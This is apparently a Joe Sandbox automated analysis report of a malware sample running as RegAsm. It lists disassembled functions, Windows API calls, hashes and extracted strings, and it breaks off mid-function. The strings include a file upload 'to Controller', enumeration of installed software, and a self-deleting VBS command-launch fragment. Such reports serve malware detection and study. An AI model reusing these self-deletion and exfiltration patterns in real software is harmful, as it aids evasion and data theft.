                                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                        • String ID: ?
                                                                        • API String ID: 3941738427-1684325040
                                                                        • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                        • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                                        • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                        • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                                        Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: %m$~$Gon~$~F@7$~dra
                                                                        • API String ID: 4218353326-230879103
                                                                        • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                        • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                        • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                        • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                        Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                        • API String ID: 1332880857-3714951968
                                                                        • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                                        • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                                        • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                                        • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                                        Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                                        • GetCursorPos.USER32(?), ref: 0041D5E9
                                                                        • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                                        • ExitProcess.KERNEL32 ref: 0041D665
                                                                        • CreatePopupMenu.USER32 ref: 0041D66B
                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                        • String ID: Close
                                                                        • API String ID: 1657328048-3535843008
                                                                        • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                        • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                                        • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                        • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                                        Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$Info
                                                                        • String ID:
                                                                        • API String ID: 2509303402-0
                                                                        • Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                                                        • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                                        • Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                                                        • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                                        Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                                        • __aulldiv.LIBCMT ref: 00408D4D
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                        • API String ID: 3086580692-2582957567
                                                                        • Opcode ID: fab45d6a79c9ac0bf1655f247f025cadc321dba09b469fb01c23ef7c289d3ac7
                                                                        • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                                        • Opcode Fuzzy Hash: fab45d6a79c9ac0bf1655f247f025cadc321dba09b469fb01c23ef7c289d3ac7
                                                                        • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                                        Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                                        • _free.LIBCMT ref: 004512FF
                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                        • _free.LIBCMT ref: 00451321
                                                                        • _free.LIBCMT ref: 00451336
                                                                        • _free.LIBCMT ref: 00451341
                                                                        • _free.LIBCMT ref: 00451363
                                                                        • _free.LIBCMT ref: 00451376
                                                                        • _free.LIBCMT ref: 00451384
                                                                        • _free.LIBCMT ref: 0045138F
                                                                        • _free.LIBCMT ref: 004513C7
                                                                        • _free.LIBCMT ref: 004513CE
                                                                        • _free.LIBCMT ref: 004513EB
                                                                        • _free.LIBCMT ref: 00451403
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 161543041-0
                                                                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                        • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                        • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                                        Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                          • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                        • _free.LIBCMT ref: 10007CFB
                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                        • _free.LIBCMT ref: 10007D1D
                                                                        • _free.LIBCMT ref: 10007D32
                                                                        • _free.LIBCMT ref: 10007D3D
                                                                        • _free.LIBCMT ref: 10007D5F
                                                                        • _free.LIBCMT ref: 10007D72
                                                                        • _free.LIBCMT ref: 10007D80
                                                                        • _free.LIBCMT ref: 10007D8B
                                                                        • _free.LIBCMT ref: 10007DC3
                                                                        • _free.LIBCMT ref: 10007DCA
                                                                        • _free.LIBCMT ref: 10007DE7
                                                                        • _free.LIBCMT ref: 10007DFF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 161543041-0
                                                                        • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                        • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                        • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                        • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                        Function 0040A726 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNEL32(00001388), ref: 0040A740
                                                                          • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                                          • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                          • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                          • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                        • String ID: 8SG$8SG$@5U$pQG$pQG
                                                                        • API String ID: 3795512280-1227615734
                                                                        • Opcode ID: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                                                                        • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                                        • Opcode Fuzzy Hash: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                                                                        • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                                                        Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                          • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                                          • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                                                                          • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                                        • ExitProcess.KERNEL32 ref: 0040D9C4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                        • API String ID: 1913171305-3159800282
                                                                        • Opcode ID: 260fab9fb5891a43e4fef7b59b37253bdbc83e54b4a4747c2b6c438f3c1e3980
                                                                        • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                                        • Opcode Fuzzy Hash: 260fab9fb5891a43e4fef7b59b37253bdbc83e54b4a4747c2b6c438f3c1e3980
                                                                        • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                                        Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                        • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                                        • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                        • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                                        Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                                                                        • GetLastError.KERNEL32 ref: 00455CEF
                                                                        • __dosmaperr.LIBCMT ref: 00455CF6
                                                                        • GetFileType.KERNEL32 ref: 00455D02
                                                                        • GetLastError.KERNEL32 ref: 00455D0C
                                                                        • __dosmaperr.LIBCMT ref: 00455D15
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                                        • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                                        • GetLastError.KERNEL32 ref: 00455EB1
                                                                        • __dosmaperr.LIBCMT ref: 00455EB8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                        • String ID: H
                                                                        • API String ID: 4237864984-2852464175
                                                                        • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                        • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                                        • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                        • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                                        Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                                        • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                                        • __alloca_probe_16.LIBCMT ref: 00453F94
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                                        • __freea.LIBCMT ref: 00454003
                                                                        • __freea.LIBCMT ref: 0045400F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                        • String ID: \@E
                                                                        • API String ID: 201697637-1814623452
                                                                        • Opcode ID: fb6195c260b9ae5d4324619eca1f95c452dc13a98459a94436f4153b7f964d62
                                                                        • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                                        • Opcode Fuzzy Hash: fb6195c260b9ae5d4324619eca1f95c452dc13a98459a94436f4153b7f964d62
                                                                        • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                                        Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: \&G$\&G$`&G
                                                                        • API String ID: 269201875-253610517
                                                                        • Opcode ID: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
                                                                        • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                                        • Opcode Fuzzy Hash: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
                                                                        • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                                        Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 65535$udp
                                                                        • API String ID: 0-1267037602
                                                                        • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                        • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                                        • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                        • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                                        Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                                        • __dosmaperr.LIBCMT ref: 0043A8A6
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                                        • __dosmaperr.LIBCMT ref: 0043A8E3
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
